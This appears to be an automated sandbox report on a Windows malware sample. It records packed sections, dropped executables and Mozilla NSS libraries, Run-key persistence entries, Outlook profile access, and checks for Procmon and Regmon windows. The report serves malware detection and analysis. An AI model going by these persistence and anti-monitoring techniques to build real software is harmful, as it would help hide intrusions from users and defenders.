Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: Google Drive.lnk.2.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: YouTube.lnk.2.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Sheets.lnk.2.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Gmail.lnk.2.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Slides.lnk.2.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
Source: Docs.lnk.2.dr	LNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\file.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001

Jump to behavior

Source: file.exe

Static file information: File size 1769472 > 1048576

Source: file.exe

Static PE information: Raw size of vzzebkzr is bigger than: 0x100000 < 0x196200

Source:	Binary string: mozglue.pdbP source: file.exe, 00000000.00000002.2444941161.000000006F8DD000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: freebl3.pdb source: freebl3[1].dll.0.dr
Source:	Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr
Source:	Binary string: nss3.pdb@ source: file.exe, 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr
Source:	Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr
Source:	Binary string: nss3.pdb source: file.exe, 00000000.00000002.2444738311.000000006C88F000.00000002.00000001.01000000.00000009.sdmp
Source:	Binary string: E:\defOff\defOff\defOff\obj\Release\defOff.pdb source: 6ca8f7e5e2.exe, 0000001C.00000002.3234613761.0000000006202000.00000040.00000800.00020000.00000000.sdmp, 6ca8f7e5e2.exe, 0000001C.00000003.3134274078.0000000008340000.00000004.00001000.00020000.00000000.sdmp, 9fc857756c.exe, 00000025.00000002.3245894424.00000000005C2000.00000040.00000001.01000000.00000012.sdmp, 9fc857756c.exe, 00000025.00000003.3103554251.0000000004830000.00000004.00001000.00020000.00000000.sdmp, 9fc857756c.exe, 0000002E.00000002.3502473300.0000000000932000.00000040.00000001.01000000.00000012.sdmp, 9fc857756c.exe, 0000002E.00000003.3459258841.0000000004680000.00000004.00001000.00020000.00000000.sdmp
Source:	Binary string: mozglue.pdb source: file.exe, 00000000.00000002.2444941161.000000006F8DD000.00000002.00000001.01000000.0000000A.sdmp
Source:	Binary string: softokn3.pdb source: softokn3[1].dll.0.dr

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\file.exe	Unpacked PE file: 0.2.file.exe.5a0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;vzzebkzr:EW;ojovyesw:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;vzzebkzr:EW;ojovyesw:EW;.taggant:EW;
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Unpacked PE file: 21.2.DocumentsDHCAECGIEB.exe.560000.0.unpack :EW;.rsrc:W;.idata :W;brbzgqah:EW;rlxxbpej:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;brbzgqah:EW;rlxxbpej:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 22.2.skotes.exe.ad0000.0.unpack :EW;.rsrc:W;.idata :W;brbzgqah:EW;rlxxbpej:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;brbzgqah:EW;rlxxbpej:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 24.2.skotes.exe.ad0000.0.unpack :EW;.rsrc:W;.idata :W;brbzgqah:EW;rlxxbpej:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;brbzgqah:EW;rlxxbpej:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Unpacked PE file: 28.2.6ca8f7e5e2.exe.aa0000.0.unpack :EW;.rsrc:W;.idata :W;nrokrzch:EW;ycjzqqvu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;nrokrzch:EW;ycjzqqvu:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Unpacked PE file: 34.2.9305c7ab92.exe.d0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;vzzebkzr:EW;ojovyesw:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;vzzebkzr:EW;ojovyesw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Unpacked PE file: 35.2.6ca8f7e5e2.exe.aa0000.0.unpack :EW;.rsrc:W;.idata :W;nrokrzch:EW;ycjzqqvu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;nrokrzch:EW;ycjzqqvu:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Unpacked PE file: 37.2.9fc857756c.exe.5c0000.0.unpack :EW;.rsrc:W;.idata :W;rhdvqhbi:EW;ucfxntef:EW;.taggant:EW; vs :ER;.rsrc:W;
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Unpacked PE file: 43.2.6ca8f7e5e2.exe.aa0000.0.unpack :EW;.rsrc:W;.idata :W;nrokrzch:EW;ycjzqqvu:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;nrokrzch:EW;ycjzqqvu:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Unpacked PE file: 44.2.9305c7ab92.exe.d0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;vzzebkzr:EW;ojovyesw:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;vzzebkzr:EW;ojovyesw:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Unpacked PE file: 46.2.9fc857756c.exe.930000.0.unpack :EW;.rsrc:W;.idata :W;rhdvqhbi:EW;ucfxntef:EW;.taggant:EW; vs :ER;.rsrc:W;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: 6ca8f7e5e2.exe.24.dr	Static PE information: real checksum: 0x30f05d should be: 0x31b577
Source: clip64.dll.24.dr	Static PE information: real checksum: 0x0 should be: 0x26304
Source: clip64[1].dll.24.dr	Static PE information: real checksum: 0x0 should be: 0x26304
Source: clip.dll.24.dr	Static PE information: real checksum: 0x0 should be: 0x26304
Source: DocumentsDHCAECGIEB.exe.0.dr	Static PE information: real checksum: 0x32b512 should be: 0x31fe4c
Source: clip[1].dll.24.dr	Static PE information: real checksum: 0x0 should be: 0x26304
Source: random[1].exe.0.dr	Static PE information: real checksum: 0x32b512 should be: 0x31fe4c
Source: random[1].exe0.24.dr	Static PE information: real checksum: 0x2bd6a5 should be: 0x2bd9d5
Source: 9305c7ab92.exe.24.dr	Static PE information: real checksum: 0x1b386d should be: 0x1bdf07
Source: random[2].exe.24.dr	Static PE information: real checksum: 0x30f05d should be: 0x31b577
Source: 9fc857756c.exe.24.dr	Static PE information: real checksum: 0x2bd6a5 should be: 0x2bd9d5
Source: random[1].exe.24.dr	Static PE information: real checksum: 0x1b386d should be: 0x1bdf07
Source: file.exe	Static PE information: real checksum: 0x1b386d should be: 0x1bdf07
Source: skotes.exe.21.dr	Static PE information: real checksum: 0x32b512 should be: 0x31fe4c

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .rsrc
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: vzzebkzr
Source: file.exe	Static PE information: section name: ojovyesw
Source: file.exe	Static PE information: section name: .taggant
Source: softokn3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3.dll.0.dr	Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr	Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr	Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr	Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr	Static PE information: section name: .didat
Source: random[1].exe.0.dr	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name: .idata
Source: random[1].exe.0.dr	Static PE information: section name: brbzgqah
Source: random[1].exe.0.dr	Static PE information: section name: rlxxbpej
Source: random[1].exe.0.dr	Static PE information: section name: .taggant
Source: DocumentsDHCAECGIEB.exe.0.dr	Static PE information: section name:
Source: DocumentsDHCAECGIEB.exe.0.dr	Static PE information: section name: .idata
Source: DocumentsDHCAECGIEB.exe.0.dr	Static PE information: section name: brbzgqah
Source: DocumentsDHCAECGIEB.exe.0.dr	Static PE information: section name: rlxxbpej
Source: DocumentsDHCAECGIEB.exe.0.dr	Static PE information: section name: .taggant
Source: nss3.dll.0.dr	Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr	Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr	Static PE information: section name: .00cfg
Source: skotes.exe.21.dr	Static PE information: section name:
Source: skotes.exe.21.dr	Static PE information: section name: .idata
Source: skotes.exe.21.dr	Static PE information: section name: brbzgqah
Source: skotes.exe.21.dr	Static PE information: section name: rlxxbpej
Source: skotes.exe.21.dr	Static PE information: section name: .taggant
Source: random[2].exe.24.dr	Static PE information: section name:
Source: random[2].exe.24.dr	Static PE information: section name: .idata
Source: random[2].exe.24.dr	Static PE information: section name: nrokrzch
Source: random[2].exe.24.dr	Static PE information: section name: ycjzqqvu
Source: random[2].exe.24.dr	Static PE information: section name: .taggant
Source: 6ca8f7e5e2.exe.24.dr	Static PE information: section name:
Source: 6ca8f7e5e2.exe.24.dr	Static PE information: section name: .idata
Source: 6ca8f7e5e2.exe.24.dr	Static PE information: section name: nrokrzch
Source: 6ca8f7e5e2.exe.24.dr	Static PE information: section name: ycjzqqvu
Source: 6ca8f7e5e2.exe.24.dr	Static PE information: section name: .taggant
Source: random[1].exe.24.dr	Static PE information: section name:
Source: random[1].exe.24.dr	Static PE information: section name: .rsrc
Source: random[1].exe.24.dr	Static PE information: section name: .idata
Source: random[1].exe.24.dr	Static PE information: section name:
Source: random[1].exe.24.dr	Static PE information: section name: vzzebkzr
Source: random[1].exe.24.dr	Static PE information: section name: ojovyesw
Source: random[1].exe.24.dr	Static PE information: section name: .taggant
Source: 9305c7ab92.exe.24.dr	Static PE information: section name:
Source: 9305c7ab92.exe.24.dr	Static PE information: section name: .rsrc
Source: 9305c7ab92.exe.24.dr	Static PE information: section name: .idata
Source: 9305c7ab92.exe.24.dr	Static PE information: section name:
Source: 9305c7ab92.exe.24.dr	Static PE information: section name: vzzebkzr
Source: 9305c7ab92.exe.24.dr	Static PE information: section name: ojovyesw
Source: 9305c7ab92.exe.24.dr	Static PE information: section name: .taggant
Source: random[1].exe0.24.dr	Static PE information: section name:
Source: random[1].exe0.24.dr	Static PE information: section name: .idata
Source: random[1].exe0.24.dr	Static PE information: section name: rhdvqhbi
Source: random[1].exe0.24.dr	Static PE information: section name: ucfxntef
Source: random[1].exe0.24.dr	Static PE information: section name: .taggant
Source: 9fc857756c.exe.24.dr	Static PE information: section name:
Source: 9fc857756c.exe.24.dr	Static PE information: section name: .idata
Source: 9fc857756c.exe.24.dr	Static PE information: section name: rhdvqhbi
Source: 9fc857756c.exe.24.dr	Static PE information: section name: ucfxntef
Source: 9fc857756c.exe.24.dr	Static PE information: section name: .taggant

Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Code function: 21_2_0057D91C push ecx; ret	21_2_0057D92F
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Code function: 21_2_00678101 push edi; mov dword ptr [esp], 058CA53Ch	21_2_00678176
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Code function: 21_2_00678101 push 4DAEAEFAh; mov dword ptr [esp], ebx	21_2_0067818D
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Code function: 21_2_00678101 push 03CB6DB1h; mov dword ptr [esp], edx	21_2_006781F3
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Code function: 21_2_00678101 push eax; mov dword ptr [esp], ebp	21_2_00678297
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Code function: 21_2_00678101 push eax; mov dword ptr [esp], edx	21_2_006782B9
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Code function: 21_2_00678101 push eax; mov dword ptr [esp], esi	21_2_0067830C
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Code function: 21_2_00678101 push 645B08ABh; mov dword ptr [esp], ebp	21_2_0067832E
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Code function: 21_2_00571359 push es; ret	21_2_0057135A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 22_2_00AED91C push ecx; ret	22_2_00AED92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 24_2_00AED91C push ecx; ret	24_2_00AED92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 24_2_00AEDFC6 push ecx; ret	24_2_00AEDFD9

Source: file.exe	Static PE information: section name: vzzebkzr entropy: 7.952500724372932
Source: random[1].exe.0.dr	Static PE information: section name: entropy: 7.045258910536622
Source: DocumentsDHCAECGIEB.exe.0.dr	Static PE information: section name: entropy: 7.045258910536622
Source: skotes.exe.21.dr	Static PE information: section name: entropy: 7.045258910536622
Source: random[2].exe.24.dr	Static PE information: section name: entropy: 6.9754652613075425
Source: 6ca8f7e5e2.exe.24.dr	Static PE information: section name: entropy: 6.9754652613075425
Source: random[1].exe.24.dr	Static PE information: section name: vzzebkzr entropy: 7.952500724372932
Source: 9305c7ab92.exe.24.dr	Static PE information: section name: vzzebkzr entropy: 7.952500724372932
Source: random[1].exe0.24.dr	Static PE information: section name: entropy: 7.806507725125042
Source: 9fc857756c.exe.24.dr	Static PE information: section name: entropy: 7.806507725125042

Persistence and Installation Behavior

Drops PE files to the document folder of the user

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\DocumentsDHCAECGIEB.exe

Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\clip[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\nss3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\T9RRWRNL\clip64[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\msvcp140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\freebl3[1].dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1005203011\clip.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\DocumentsDHCAECGIEB.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\softokn3[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[2].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\vcruntime140[1].dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[1].exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1005204011\clip64.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\53IVYM2Y\random[1].exe	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\mozglue[1].dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\mozglue.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\nss3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\msvcp140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\freebl3.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\vcruntime140.dll	Jump to dropped file
Source: C:\Users\user\Desktop\file.exe	File created: C:\ProgramData\softokn3.dll	Jump to dropped file

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\DocumentsDHCAECGIEB.exe

Jump to dropped file

Boot Survival

Creates multiple autostart registry keys

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9fc857756c.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run clip.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 6ca8f7e5e2.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run clip64.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 9305c7ab92.exe

Drops PE files to the user root directory

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\DocumentsDHCAECGIEB.exe

Jump to dropped file

Monitors registry run keys for changes

Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Registry key monitored: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

Jump to behavior

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\DocumentsDHCAECGIEB.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005218001\9305c7ab92.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005220001\9fc857756c.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Window searched: window name: RegmonClass
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Window searched: window name: Regmonclass
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Window searched: window name: Filemonclass
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Window searched: window name: FilemonClass
Source: C:\Users\user\AppData\Local\Temp\1005217001\6ca8f7e5e2.exe	Window searched: window name: PROCMON_WINDOW_CLASS
